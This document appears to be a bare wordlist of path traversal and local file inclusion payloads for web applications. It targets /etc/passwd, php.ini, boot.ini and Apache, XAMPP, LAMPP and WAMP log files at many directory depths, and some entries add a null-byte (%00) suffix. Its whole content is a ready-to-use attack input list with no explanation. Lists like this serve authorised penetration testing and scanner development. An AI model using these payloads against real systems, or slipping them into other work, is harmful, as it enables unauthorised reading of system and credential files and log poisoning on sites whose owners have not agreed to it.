/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
/var/log/apache2/access.log
/opt/lampp/logs/access_log
/opt/xampp/logs/access_log
/opt/xampp/logs/error_log
/opt/lampp/logs/error.log
/opt/xampp/logs/error.log
/Program Files\Apache Group\Apache\logs\error.log
/logs/access_log
/logs/error_log
/etc/php.ini
/bin/php.ini
C:\boot.ini
C:/boot.ini
C:\wamp\logs\access.log
c:\wamp\logs\access.log
../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00
../../../../../../../../../../../../../../../opt/xampp/logs/access.log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log
../../../../../../../../../../../../../../../apache/logs/error.log
../../../../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../../../../opt/xampp/logs/error.log
     
